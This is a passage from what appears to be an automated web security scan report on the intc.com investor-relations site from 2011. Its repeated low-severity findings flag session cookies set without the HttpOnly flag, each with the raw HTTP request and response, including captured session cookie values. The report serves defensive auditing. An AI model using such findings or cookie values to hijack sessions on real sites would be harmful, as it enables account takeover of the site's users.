The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /analystCenter.cfm HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:14:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:50 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:50 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:50 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...

12.57. http://www.intc.com/annuals.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /annuals.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /annuals.cfm HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:16:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A16%3A36%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:16:36 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:16:36 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:16:36 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...

12.58. http://www.intc.com/briefcase.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /briefcase.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /briefcase.cfm HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:15:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A15%3A09%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:10 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40579%2E7605208;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:10 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:15:10 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...

12.59. http://www.intc.com/common/download/download.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /common/download/download.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /common/download/download.cfm?CompanyID=INTC&FileID=361738&FileKey=f79153d7-eceb-4b38-8a7e-e2917f999659&FileName=_0008_virtual_1.jpg HTTP/1.1
Host: www.intc.com
Proxy-Connection: keep-alive
Referer: http://www.intc.com/index.cfm?iid=ftr+invrel
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NOMOBILE=0; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C1D065BF6CBF3E92923967C8F41218506; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Sat, 05 Feb 2011 23:14:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A15%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:15 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:15 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:15 GMT;path=/
location: http://files.shareholder.com/downloads/INTC/1158415371x0x361738/f79153d7-eceb-4b38-8a7e-e2917f999659/_0008_virtual_1.jpg
Content-Type: text/html; charset=UTF-8


<script type="text/javascript">
<!--//

document.write(" <img src=\"http://apps.shareholder.com/track/trackpage.aspx?c=INTC&p=common%2Fdownload%2Fdow
...[SNIP]...

12.60. http://www.intc.com/common/download/download.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /common/download/download.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /common/download/download.cfm HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Sat, 05 Feb 2011 23:15:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: X_SESSION=1158416520%7C%20%7Bts%20%272011%2D02%2D05%2018%3A15%3A59%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A15%3A59%27%7D%7C5E03233E5E00EFF0D4D7E6B4BD7D2167;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:59 GMT;path=/
Set-Cookie: X_BRIEFCASE=UPDATED%7C40489%2E7610995;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:59 GMT;path=/
Set-Cookie: X_PREVIEW=;expires=Fri, 05-Feb-2010 23:15:59 GMT;path=/
location: http://files.shareholder.com/downloads/x/1158416520x0x//
Content-Type: text/html; charset=UTF-8


<script type="text/javascript">
<!--//

document.write(" <img src=\"http://apps.shareholder.com/track/trackpage.aspx?c=X&p=common%2Fdownload%2Fdownlo
...[SNIP]...

12.61. http://www.intc.com/common/mobile/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /common/mobile/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /common/mobile/?CompanyID=INTC HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:16:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A16%3A02%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:16:02 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:16:02 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:16:02 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8
...[SNIP]...

12.62. http://www.intc.com/contactUs.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /contactUs.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /contactUs.cfm HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:14:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A52%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:52 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:52 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:52 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...

12.63. http://www.intc.com/corpInfo.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /corpInfo.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corpInfo.cfm HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:14:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:50 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:50 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:50 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...

12.64. http://www.intc.com/education.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /education.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /education.cfm HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:14:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:51 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:51 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:51 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...

12.65. http://www.intc.com/eventdetail.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /eventdetail.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /eventdetail.cfm?EventID=92109 HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:14:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A48%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:48 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:48 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:48 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...

12.66. http://www.intc.com/events.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /events.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /events.cfm HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:14:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A49%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:49 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:49 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:49 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...

12.67. http://www.intc.com/faq.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /faq.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /faq.cfm HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:16:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A16%3A33%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:16:33 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:16:33 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:16:33 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...

12.68. http://www.intc.com/financial-statements.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /financial-statements.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /financial-statements.cfm HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:15:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A15%3A21%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:22 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:22 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:15:22 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...

12.69. http://www.intc.com/financials.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /financials.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /financials.cfm HTTP/1.1
Host: www.intc.com
Proxy-Connection: keep-alive
Referer: http://www.intc.com/index.cfm?iid=ftr+invrel
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NOMOBILE=0; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; __utmc=170079864; __utmb=170079864.2.10.1296947606; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A29%27%7D%7C1D065BF6CBF3E92923967C8F41218506; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:13:34 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A13%3A33%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:13:34 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:13:34 GMT;path=/
